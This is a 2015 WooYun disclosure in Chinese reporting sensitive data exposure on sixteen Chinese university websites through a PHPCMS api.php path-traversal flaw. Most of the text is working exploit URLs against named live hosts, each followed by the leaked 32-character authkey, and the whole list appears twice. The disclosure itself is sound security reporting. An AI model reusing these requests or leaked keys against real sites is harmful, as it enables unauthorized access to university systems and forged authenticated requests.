漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0128335
漏洞标题:16所高校敏感信息泄露打包
相关厂商:CCERT教育网应急响应组
漏洞作者: blaz
提交时间:2015-07-22 17:14
修复时间:2015-07-27 17:16
公开时间:2015-07-27 17:16
漏洞类型:敏感信息泄露
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
16所高校敏感信息泄露
详细说明:
http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])
http://xcb.ytu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
8Uh9SlA7TsbITlkbn0PTCBEgGu2YKExC
rsgis.whu.edu.cn
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://www.ykuc.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
7OoWDH7UfC24hII8F2pPb01U7Q7OxSay
http://sfl.swjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
zfQgF9q94PPw7PLqAsPLuHb0Qw9PGuM2
http://mec.xjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
xhmU2v8QCvBgvf8VIfRvYKtneBnyb6Za
http://jwc.shsmu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
MQgwGUdYCZeNHsMb4HShP0hF5gQpSgto
http://rsgis.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://cj.dhu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Hlra5Dsc8VwN8ggbgppFVrkyXgI9Y5gi
http://gr.xupt.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
GO96qk2bSlbK6xE1bMmQXRrXuO1I0zFS
http://software.hebtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
hF5B9BbCByB2c1RyRk1AI9D5MSuPVYk7
http://kj.swufe.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
sg4w8IRFeCg0r6hWlB2SQGw6SgSi8C9t
http://oursim.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
PndaqkaRH6Pe2G7nkPnxSUSLGafw9Gno
http://www.lib.sjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
cmqwkeX4D9RELpW82oCMCclBsdzyVGg5
http://gibs.gcu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aZHD4GxRf2aOrbZ4ehaaXK2vxMD2G0kb
http://hqglc.usx.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
29aVM9gsH7YsqQFT80v0lC75vVBQFHEI
漏洞证明:
http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])
http://xcb.ytu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
8Uh9SlA7TsbITlkbn0PTCBEgGu2YKExC
rsgis.whu.edu.cn
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://www.ykuc.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
7OoWDH7UfC24hII8F2pPb01U7Q7OxSay
http://sfl.swjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
zfQgF9q94PPw7PLqAsPLuHb0Qw9PGuM2
http://mec.xjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
xhmU2v8QCvBgvf8VIfRvYKtneBnyb6Za
http://jwc.shsmu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
MQgwGUdYCZeNHsMb4HShP0hF5gQpSgto
http://rsgis.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
http://cj.dhu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Hlra5Dsc8VwN8ggbgppFVrkyXgI9Y5gi
http://gr.xupt.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
GO96qk2bSlbK6xE1bMmQXRrXuO1I0zFS
http://software.hebtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
hF5B9BbCByB2c1RyRk1AI9D5MSuPVYk7
http://kj.swufe.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
sg4w8IRFeCg0r6hWlB2SQGw6SgSi8C9t
http://oursim.whu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
PndaqkaRH6Pe2G7nkPnxSUSLGafw9Gno
http://www.lib.sjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
cmqwkeX4D9RELpW82oCMCclBsdzyVGg5
http://gibs.gcu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
aZHD4GxRf2aOrbZ4ehaaXK2vxMD2G0kb
http://hqglc.usx.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
29aVM9gsH7YsqQFT80v0lC75vVBQFHEI
修复方案:
升级到最新版本
版权声明:转载请注明来源 blaz@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-07-27 17:16
厂商回复:
最新状态:
暂无